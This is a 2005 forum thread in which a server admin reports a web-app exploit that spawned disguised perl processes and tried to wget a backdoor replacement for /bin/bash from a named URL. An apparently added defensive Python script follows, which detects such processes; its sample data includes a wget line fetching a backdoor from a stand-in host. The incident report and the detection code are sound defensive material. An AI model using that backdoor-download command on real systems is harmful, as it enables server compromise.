The Nightstar Zoo

Nightstar IRC Network - irc.nightstar.net

All times are UTC - 6 hours [ DST ]




Post new topic Reply to topic  [ 2 posts ] 
PostPosted: Thu May 12, 2005 11:53 am
Knight of Daisies, Tulip Slayer

Joined: Sat May 11, 2002 5:39 pm
Posts: 316
At 22:11 Central time, someone attempted to exploit a bug somewhere in the system - my guess is that they hit the PHPNuke or PHPBB code on Nightstar.

The hack spawned off two perl processes, one called 'sik' and the other called '[EntropyClient]'.

Between them, they maxed out the CPU, and somehow maxed out the bandwidth as well.

Once connected, the process used wget to attempt to find this file.

http://myshellz.com/xpl/backdoors/bash

(which does exist, I haven't had a chance to look at it - anyone that wants a copy, let me know - I downloaded it.)

Luckily, because I'm reasonably paranoid about apache, the process they were running as was 'nobody', which has no rights to be able to escalate itself and replace /bin/bash.

I was actually aware that this was going on within approximately 60 seconds, and had logged into the box to check it. Unfortunately, right as I was killing the processes, they maxed out the bandwidth and my command couldn't go through. I had to manually go to the box.

By 23:30, I'd reached the box, killed the processes, and gotten everything restarted.

However - as part of trying to make sure they couldn't repeat that, I put in updates for apache, php, and several other packages. The PHP package upgrade conflicted with the version of MySQL I put in, so I didn't realize that the zoo wasn't functioning.

This morning, I identified the problem and reverted the php.

However, the code in the zoo will probably have to be looked at.

BW

_________________
----------------------------------------------------------
I'll get a life when it is proven and substantiated to be better than what I am currently experiencing.


PostPosted: Sun Jul 24, 2005 7:20 pm 
Some long-forgotten guide to Apache wrote:
Question: Why does Apache run as "nobody" by default?
Answer: Because it's the only webserver with a <blank>ing clue.


It's nice to see people taking good security precautions in building their webservers. Restores a little of your faith in humanity's sanity, so to speak.
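The two things this incident turned on, as both posts describe them, are that the attacker's processes ran as the web-server user and that this user could not replace /bin/bash. As an added example (not code from the thread, from Nightstar, or from phpBB), here is a small Python script that checks both from the defender's side: it parses `ps` output and flags processes owned by the web-server user that are not the server binary (high CPU, a downloader on the command line, or a name in square brackets that masquerades as a kernel thread), and it evaluates whether a given user could overwrite or replace a file from plain POSIX permissions. The process names 'sik' and '[EntropyClient]' come from the first post; every PID, CPU figure and the download host in the sample are constructed, and the live check against /bin/bash only runs when the script is executed directly.

```python
"""Defender-side checks for the incident described in this thread: a web-app
bug used to spawn processes as the web-server user, which then fetched a
replacement for /bin/bash.

Added example, not code from the thread or from Nightstar. Process names
'sik' and '[EntropyClient]' are taken from the first post; all PIDs, CPU
figures and the download host below are constructed for illustration.
"""
import os
import re
from dataclasses import dataclass
from typing import Iterable, Sequence


@dataclass
class Proc:
    user: str
    pid: int
    ppid: int
    cpu: float
    cmd: str


# Constructed sample in the shape of `ps -eo user,pid,ppid,pcpu,args`.
SAMPLE_PS = """\
USER       PID  PPID %CPU COMMAND
root         1     0  0.0 init
root      1203     1  0.0 /usr/sbin/httpd
nobody    1210  1203  0.3 /usr/sbin/httpd
nobody    1211  1203  0.2 /usr/sbin/httpd
nobody    4412  1210 49.0 sik
nobody    4413  1210 48.5 [EntropyClient]
nobody    4420  4412  1.0 wget http://example.invalid/xpl/backdoors/bash
"""

# Command names that mean "something is pulling a file from the network".
DOWNLOADERS = ("wget", "curl", "fetch", "lynx")


def parse_ps(text: str) -> list[Proc]:
    """Parse `ps -eo user,pid,ppid,pcpu,args` output; the header line is skipped."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        user, pid, ppid, cpu, cmd = parts
        procs.append(Proc(user, int(pid), int(ppid), float(cpu), cmd))
    return procs


def suspicious_children(procs: Iterable[Proc], web_user: str = "nobody",
                        server_bins: Sequence[str] = ("/usr/sbin/httpd",),
                        cpu_threshold: float = 20.0):
    """Return (pid, binary, reasons) for processes owned by the web-server user
    that are not the server binary itself. A web server has no business running
    perl or wget under its own account, so anything else is worth a look."""
    findings = []
    for p in procs:
        if p.user != web_user:
            continue
        binary = p.cmd.split()[0]
        if binary in server_bins:
            continue
        reasons = ["not the web-server binary"]
        if p.cpu >= cpu_threshold:
            reasons.append(f"high cpu ({p.cpu:.1f}%)")
        if os.path.basename(binary) in DOWNLOADERS or re.search(r"https?://", p.cmd):
            reasons.append("downloads from the network")
        if binary.startswith("[") and binary.endswith("]"):
            # Real kernel threads are owned by root; a bracketed name on a
            # user-owned process is a disguise, as with '[EntropyClient]'.
            reasons.append("masquerades as a kernel thread")
        findings.append((p.pid, binary, reasons))
    return findings


def user_can_write(perm: tuple, user: str, groups: Iterable[str]) -> bool:
    """Plain POSIX mode check. perm = (owner, group, mode); root always can.
    ACLs, capabilities and the sticky bit are deliberately ignored."""
    owner, group, mode = perm
    if user == "root":
        return True
    if user == owner:
        return bool(mode & 0o200)
    if group in groups:
        return bool(mode & 0o020)
    return bool(mode & 0o002)


def can_replace_file(file_perm: tuple, dir_perm: tuple, user: str, groups: Iterable[str]) -> bool:
    """A user can replace a file if they can write it in place, or can write the
    containing directory (unlink and recreate). This is the check that decided
    whether 'nobody' could swap out /bin/bash in the incident."""
    return user_can_write(file_perm, user, groups) or user_can_write(dir_perm, user, groups)


def live_perm(path: str) -> tuple:
    """(owner, group, mode) for a real path; Unix only, hence the local imports."""
    import grp
    import pwd
    st = os.stat(path)
    return (pwd.getpwuid(st.st_uid).pw_name, grp.getgrgid(st.st_gid).gr_name, st.st_mode & 0o7777)


if __name__ == "__main__":
    for pid, binary, reasons in suspicious_children(parse_ps(SAMPLE_PS)):
        print(f"pid {pid:>5}  {binary:<18} {'; '.join(reasons)}")
    shell = "/bin/bash"
    if os.path.exists(shell):
        replaceable = can_replace_file(live_perm(shell), live_perm(os.path.dirname(shell)), "nobody", ["nobody"])
        print(f"{shell} replaceable by nobody: {replaceable}")
```

On a real host, feed the output of `ps -eo user,pid,ppid,pcpu,args` to `parse_ps`; the sample above exists only so the script runs offline. The permission check is intentionally the simple POSIX model the second post is praising, which is exactly why the result for a stock `/bin/bash` under a root-owned `/bin` is False for the web-server user.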


Powered by phpBB® Forum Software © phpBB Group